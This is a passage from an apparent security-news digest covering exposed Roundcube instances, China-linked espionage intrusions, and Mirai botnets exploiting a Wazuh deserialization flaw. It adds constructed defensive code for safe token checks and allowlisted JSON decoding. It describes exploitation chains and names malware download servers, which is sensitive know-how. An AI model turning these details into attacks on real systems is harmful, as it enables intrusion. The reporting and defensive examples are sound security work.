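    print(get_shipping_cost(tok, "bob@example.com"))     # None: subject mismatch
    print(generate_user_token(None, "bob@example.com"))  # None: not authenticated
```

    The same two checks are what a reviewer should look for in any REST route that takes a token plus a target identifier: the token was issued to an authenticated caller, and its subject is compared against the target of the request rather than against a constant.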

    Over 2 Million Roundcube Webmail Instances Found Online

    Attack surface management platform Censys has revealed that it found 2,473,116 exposed Roundcube Webmail instances online, with a majority of them located in Europe and North America.



    Source: thehackernews.com…

  • Over 70 Organizations Across Multiple Sectors Targeted by China-Linked Cyber Espionage Group

    Jun 09, 2025 | Ravie Lakshmanan | Government Security / Cyber Espionage

    The reconnaissance activity targeting American cybersecurity company SentinelOne was part of a broader set of partially related intrusions into several targets between July 2024 and March 2025.

    “The victimology includes a South Asian government entity, a European media organization, and more than 70 organizations across a wide range of sectors,” SentinelOne security researchers Aleksandar Milenkoski and Tom Hegel said in a report published today.

    Some of the targeted sectors include manufacturing, government, finance, telecommunications, and research. Also present among the victims was an IT services and logistics company that was managing hardware logistics for SentinelOne employees at the time of the breach in early 2025.

    The malicious activity has been attributed with high confidence to China-nexus threat actors, with some of the attacks tied to a threat cluster dubbed PurpleHaze, which, in turn, overlaps with Chinese cyber espionage groups publicly reported as APT15 and UNC5174.

    In late April 2024, SentinelOne first disclosed PurpleHaze-related reconnaissance activity targeting some of its servers that were deliberately accessible over the internet by “virtue of their functionality.”


    “The threat actor’s activities were limited to mapping and evaluating the availability of select internet-facing servers, likely in preparation for potential future actions,” the researchers said.

    It’s currently not known if the attackers’ intent was to target only the IT logistics organization or if they planned to expand their focus to downstream organizations as well. Further investigation into the attacks has uncovered six different activity clusters (named A to F) that date back to June 2024 with the compromise of an unnamed South Asian government entity.

    The clusters are listed below –

    • Activity A: An intrusion into a South Asian government entity (June 2024)
    • Activity B: A set of intrusions targeting organizations globally (Between July 2024 and March 2025)
    • Activity C: An intrusion into an IT services and logistics company (at the beginning of 2025)
    • Activity D: An intrusion into the same South Asian government entity compromised in Activity A (October 2024)
    • Activity E: Reconnaissance activity targeting SentinelOne servers (October 2024)
    • Activity F: An intrusion into a leading European media organization (late September 2024)

    The June 2024 attack against the government entity, as previously detailed by SentinelOne, is said to have led to the deployment of ShadowPad that’s obfuscated using ScatterBrain. The ShadowPad artifacts and infrastructure overlap with recent ShadowPad campaigns that have delivered a ransomware family codenamed NailaoLocker following the exploitation of Check Point gateway devices.

    Subsequently in October 2024, the same organization was targeted to drop a Go-based reverse shell dubbed GoReShell that uses SSH to connect to an infected host. The same backdoor, SentinelOne noted, has been used in connection with a September 2024 attack aimed at a leading European media organization.

    Also common to these two activity clusters is the use of tools developed by a team of IT security experts who go by the name The Hacker’s Choice (THC). The development marks the first time THC’s software programs have been abused by state-sponsored actors.


    SentinelOne has attributed Activity F to a China-nexus actor with loose affiliations to an “initial access broker” tracked by Google Mandiant under the name UNC5174 (aka Uteus or Uetus). It’s worth noting that the threat group was recently linked to the active exploitation of SAP NetWeaver flaws to deliver GOREVERSE, a variant of GoReShell. The cybersecurity company is collectively tracking Activity D, E, and F as PurpleHaze.

    “The threat actor leveraged ORB [operational relay box] network infrastructure, which we assess to be operated from China, and exploited the CVE-2024-8963 vulnerability together with CVE-2024-8190 to establish an initial foothold, a few days before the vulnerabilities were publicly disclosed,” the researchers said. “After compromising these systems, UNC5174 is suspected of transferring access to other threat actors.”



    Source: thehackernews.com…

  • Two Distinct Botnets Exploit Wazuh Server Vulnerability to Launch Mirai-Based Attacks

    A now-patched critical security flaw in the Wazuh Server is being exploited by threat actors to drop two different Mirai botnet variants and use them to conduct distributed denial-of-service (DDoS) attacks.

    Akamai, which first discovered the exploitation efforts in late March 2025, said the malicious campaign targets CVE-2025-24016 (CVSS score: 9.9), an unsafe deserialization vulnerability that allows for remote code execution on Wazuh servers.

    The security defect, which affects all versions of the server software from 4.4.0 onward, was addressed in February 2025 with the release of 4.9.1. A proof-of-concept (PoC) exploit was publicly disclosed around the same time the patches were released.

    The problem is rooted in the Wazuh API, where parameters in the DistributedAPI are serialized as JSON and deserialized using the “as_wazuh_object” function in the framework/wazuh/core/cluster/common.py file. A threat actor could weaponize the vulnerability by injecting malicious JSON payloads to execute arbitrary Python code remotely.
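
    The general lesson from a bug of this shape is that a JSON decoder which reconstructs Python objects must never let the payload choose what code runs: tagged objects should map to a small, fixed registry of constructors, and anything else should be refused. The following is an added example of that pattern and is not Wazuh’s code or its fix; the tag names, the registry, the `__type__`/`value` envelope and the sample messages are constructed for illustration.

```python
"""Decode JSON into Python objects through an explicit allowlist of type tags.
Constructed example: tag names, registry and sample messages are made up."""
import json
from datetime import datetime
from typing import Any, Callable, Dict, Tuple

# Only these tags can be turned back into Python objects. Each constructor is a
# fixed function chosen here; nothing in the payload selects code to run.
REGISTRY: Dict[str, Callable[[Any], Any]] = {
    "datetime": lambda v: datetime.fromisoformat(v),
    "set": lambda v: set(v),
    "bytes": lambda v: bytes.fromhex(v),
}
TAG_KEY = "__type__"
VALUE_KEY = "value"


class UnsafePayload(ValueError):
    """Raised when a JSON object asks for a type outside the allowlist."""


def safe_object_hook(obj: dict) -> Any:
    """object_hook for json.loads: untagged dicts pass through unchanged,
    tagged dicts are rebuilt via REGISTRY, and unknown or malformed tags are
    rejected rather than resolved to a class or callable."""
    if TAG_KEY not in obj:
        return obj
    tag = obj[TAG_KEY]
    if set(obj) != {TAG_KEY, VALUE_KEY} or not isinstance(tag, str):
        raise UnsafePayload(f"malformed tagged object: {sorted(obj)}")
    constructor = REGISTRY.get(tag)
    if constructor is None:
        # The anti-pattern would be looking the tag up dynamically (for example
        # via getattr on a module) and calling whatever comes back; an
        # attacker-controlled tag must never decide what gets invoked.
        raise UnsafePayload(f"type tag not allowed: {tag!r}")
    try:
        return constructor(obj[VALUE_KEY])
    except (TypeError, ValueError) as exc:
        raise UnsafePayload(f"bad value for {tag!r}: {exc}") from exc


def decode(message: str) -> Any:
    return json.loads(message, object_hook=safe_object_hook)


def encode_tagged(tag: str, value: Any) -> dict:
    """Envelope the sending side uses to emit a tagged object."""
    return {TAG_KEY: tag, VALUE_KEY: value}


def decode_or_reason(message: str) -> Tuple[str, Any]:
    """Return ('ok', obj) or ('rejected', reason) so callers can log refusals."""
    try:
        return "ok", decode(message)
    except UnsafePayload as exc:
        return "rejected", str(exc)


# Constructed messages: one legitimate, two that must be refused.
GOOD_MESSAGE = json.dumps({
    "agent_ids": encode_tagged("set", ["001", "002"]),
    "since": encode_tagged("datetime", "2025-03-01T12:00:00"),
    "nested": {"raw": encode_tagged("bytes", "deadbeef")},
})
UNKNOWN_TAG_MESSAGE = json.dumps({"x": encode_tagged("SomeOtherClass", [])})
MALFORMED_MESSAGE = json.dumps({"x": {TAG_KEY: "set", VALUE_KEY: [], "extra": 1}})

if __name__ == "__main__":
    print(decode_or_reason(GOOD_MESSAGE))
    print(decode_or_reason(UNKNOWN_TAG_MESSAGE))
    print(decode_or_reason(MALFORMED_MESSAGE))
```

    Because `json.loads` applies the hook to the innermost objects first, a tagged object buried several levels deep is checked the same way as a top-level one. On the operational side, the same message flow should only be reachable by authenticated, least-privileged clients, which is the mitigating factor Wazuh itself points to in the update at the end of this story.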

    The web infrastructure company said it discovered attempts by two different botnets to exploit CVE-2025-24016 merely weeks after public disclosure of the flaw and the release of the PoC. The attacks were registered in early March and May 2025.

    “This is the latest example of the ever-shrinking time-to-exploit timelines that botnet operators have adopted for newly published CVEs,” security researchers Kyle Lefton and Daniel Messing said in a report shared with The Hacker News.


    In the first instance, a successful exploit paves the way for the execution of a shell script that serves as a downloader for the Mirai botnet payload from an external server (“176.65.134[.]62”) for different architectures. It’s assessed that the malware samples are variants of LZRD Mirai, which has been around since 2023.

    It’s worth noting that LZRD was also deployed recently in attacks exploiting GeoVision end-of-life (EoL) Internet of Things (IoT) devices. However, Akamai told The Hacker News that there is no evidence that these two activity clusters are the work of the same threat actor given that LZRD is used by myriad botnet operators.

    Further infrastructure analysis of “176.65.134[.]62” and its associated domains has led to the discovery of other Mirai botnet versions, including LZRD variants named “neon” and “vision,” and an updated version of V3G4.

    Some of the other security flaws exploited by the botnet include flaws in Hadoop YARN, TP-Link Archer AX21 (CVE-2023-1389), and a remote code execution bug in ZTE ZXV10 H108L routers.

    The second botnet to abuse CVE-2025-24016 employs a similar strategy of using a malicious shell script to deliver another Mirai botnet variant referred to as Resbot (aka Resentual).

    “One of the interesting things that we noticed about this botnet was the associated language. It was using a variety of domains to spread the malware that all had Italian nomenclature,” the researchers said. “The linguistic naming conventions could indicate a campaign to target devices owned and run by Italian-speaking users in particular.”

    Besides attempting to spread via FTP over port 21 and conducting telnet scanning, the botnet has been found to leverage a wide range of exploits targeting Huawei HG532 routers (CVE-2017-17215), the Realtek SDK (CVE-2014-8361), and TrueOnline ZyXEL P660HN-T v1 routers (CVE-2017-18368).

    “The propagation of Mirai continues relatively unabated, as it remains rather straightforward to repurpose and reuse old source code to set up or create new botnets,” the researchers said. “And botnet operators can often find success with simply leveraging newly published exploits.”

    CVE-2025-24016 is far from the only vulnerability to be abused by Mirai botnet variants. In recent attacks, threat actors have also taken advantage of CVE-2024-3721, a medium-severity command injection vulnerability affecting TBK DVR-4104 and DVR-4216 digital video recording devices, to enlist them into the botnet.

    The vulnerability is used to trigger the execution of a shell script that’s responsible for downloading the Mirai botnet from a remote server (“42.112.26[.]36”) and executing it, but not before checking if it’s currently running inside a virtual machine or QEMU.

    Russian cybersecurity company Kaspersky said the infections are concentrated around China, India, Egypt, Ukraine, Russia, Turkey, and Brazil, adding it identified over 50,000 exposed DVR devices online.


    “Exploiting known security flaws in IoT devices and servers that haven’t been patched, along with the widespread use of malware targeting Linux-based systems, leads to a significant number of bots constantly searching the internet for devices to infect,” security researcher Anderson Leite said.

    The disclosure comes as China, India, Taiwan, Singapore, Japan, Malaysia, Hong Kong, Indonesia, South Korea, and Bangladesh have emerged as the most targeted countries in the APAC region in the first quarter of 2025, according to statistics shared by StormWall.

    “API floods and carpet bombing are growing faster than traditional volumetric TCP/UDP attacks, pushing companies to adopt smarter, more flexible defenses,” the company said. “At the same time, rising geopolitical tensions are driving a surge in attacks on government systems and Taiwan – highlighting increased activity from hacktivists and state-sponsored threat actors.”

    It also follows an advisory from the U.S. Federal Bureau of Investigation (FBI) that the BADBOX 2.0 botnet has infected millions of internet-connected devices, most of which are manufactured in China, in order to turn them into residential proxies to facilitate criminal activity.

    “Cyber criminals gain unauthorized access to home networks by either configuring the product with malicious software prior to the user’s purchase or infecting the device as it downloads required applications that contain backdoors, usually during the set-up process,” the FBI said.

    “The BADBOX 2.0 botnet consists of millions of infected devices and maintains numerous backdoors to proxy services that cyber criminal actors exploit by either selling or providing free access to compromised home networks to be used for various criminal activity.”

    Update

    Wazuh, in an advisory released on June 11, 2025, said CVE-2025-24016 was fixed in October 2024 with version 4.9.1 and that successfully exploiting it requires an attacker to be in possession of valid administrative API credentials and access to the Wazuh server API.

    “As such, the likelihood of exploitation is low, and the overall risk is limited,” Wazuh said, adding the flaw has not impacted any of its customers.

    (The story was updated after publication to include information shared by Wazuh.)



    Source: thehackernews.com…